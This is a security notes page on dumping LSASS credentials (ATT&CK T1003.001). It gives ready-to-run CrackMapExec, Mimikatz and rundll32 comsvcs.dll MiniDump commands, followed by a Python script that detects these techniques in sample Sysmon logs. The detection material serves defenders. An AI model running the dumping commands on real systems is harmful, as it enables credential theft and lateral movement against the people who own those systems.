| description |
| --- |
| MITRE ATT&CK, Credential Access, Sub-technique T1003.001 |
Adversaries commonly abuse the Local Security Authority Subsystem Service (LSASS) to dump credentials for privilege escalation, data theft, and lateral movement. The process is a fruitful target for adversaries because of the sheer amount of sensitive information it stores in memory.
# Dumping LSASS remotely with CrackMapExec

```bash
crackmapexec smb $ip -u $username -p $password -M lsassy
```

# Dumping LSASS with Mimikatz

```
sekurlsa::logonPasswords
```

## https://twitter.com/inversecos/status/1450331995112804358?s=20&t=rMzsQI6ENH2SYVVaTYTqAA

```powershell
rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\output.dmp full;Wait-Process -Id (Get-Process rundll32).id
```
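The techniques above leave two host-side traces a detection engineer can key on: a handle to `lsass.exe` opened with read access (Sysmon Event ID 10, ProcessAccess) and a `rundll32` command line invoking the `MiniDump` export of `comsvcs.dll` (Sysmon Event ID 1, ProcessCreate). The Python script below is an added example, not part of the original page or of any tool it references; it runs both checks over constructed log records. The key=value record format, the PID, the file paths and the trusted-image allowlist are assumptions made for the example.

```python
import re

# PROCESS_VM_READ is the Windows access right a process must hold to read
# another process's memory. A handle to lsass.exe that includes it is the
# common denominator of memory-dumping tools; PROCESS_QUERY_INFORMATION
# (0x0400) is usually requested alongside it, so masks such as 0x1010,
# 0x1410 and 0x1fffff are typical for this activity.
PROCESS_VM_READ = 0x0010

# Source images that open lsass.exe with read access as part of normal
# operation (antivirus engines are the usual case). Assumed allowlist for
# this example; it has to be tuned per environment, and it should stay short.
TRUSTED_SOURCE_IMAGES = {
    r"c:\programdata\microsoft\windows defender\platform\msmpeng.exe",
}

# Constructed sample records (not from the original page). The format is an
# assumption: Sysmon Event ID 10 and Event ID 1 fields rendered as
# space-separated key=value pairs, quoted where a value contains spaces.
SAMPLE_LOGS = [
    r'EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000',
    r'EventID=10 SourceImage="C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe" TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1410',
    r'EventID=10 SourceImage=C:\Windows\System32\rundll32.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1fffff',
    r'EventID=1 Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe comsvcs.dll, MiniDump 652 C:\Temp\output.dmp full"',
    r'EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe report.txt"',
    r'EventID=10 SourceImage=C:\Windows\System32\rundll32.exe TargetImage=C:\Windows\System32\notepad.exe GrantedAccess=0x1fffff',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Turn one key=value record into a dict; quoted values are unquoted."""
    return {key: (quoted or bare) for key, quoted, bare in KV_RE.findall(line)}


def is_lsass_memory_read(ev):
    """Event ID 10: a handle to lsass.exe carrying PROCESS_VM_READ, opened by
    a process that is not on the allowlist."""
    if ev.get("EventID") != "10":
        return False
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    granted = int(ev.get("GrantedAccess", "0"), 16)
    if not granted & PROCESS_VM_READ:
        return False
    return ev.get("SourceImage", "").lower() not in TRUSTED_SOURCE_IMAGES


def is_comsvcs_minidump(ev):
    """Event ID 1: a command line calling the MiniDump export of comsvcs.dll,
    the living-off-the-land dump method quoted above."""
    if ev.get("EventID") != "1":
        return False
    cmd = ev.get("CommandLine", "").lower()
    return "comsvcs.dll" in cmd and "minidump" in cmd


def scan(lines):
    """Return (rule_name, offending_image) pairs for every record that matches."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if is_lsass_memory_read(ev):
            findings.append(("lsass_memory_read", ev.get("SourceImage", "")))
        if is_comsvcs_minidump(ev):
            findings.append(("comsvcs_minidump", ev.get("Image", "")))
    return findings


if __name__ == "__main__":
    for rule, image in scan(SAMPLE_LOGS):
        print(f"{rule}: {image}")
```

Run stand-alone the script reports exactly two hits, both attributed to `rundll32.exe`: the ProcessAccess record with full access to `lsass.exe` and the ProcessCreate record carrying the `comsvcs.dll, MiniDump` command line. The `svchost.exe` handle is ignored because `0x1000` lacks `PROCESS_VM_READ`, and the Defender engine handle is ignored only because its image is on the allowlist, which is where most of the tuning effort for this detection goes in practice.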
{% embed url="https://redcanary.com/threat-detection-report/techniques/lsass-memory/" %}
{% embed url="https://attack.mitre.org/techniques/T1003/001/" %}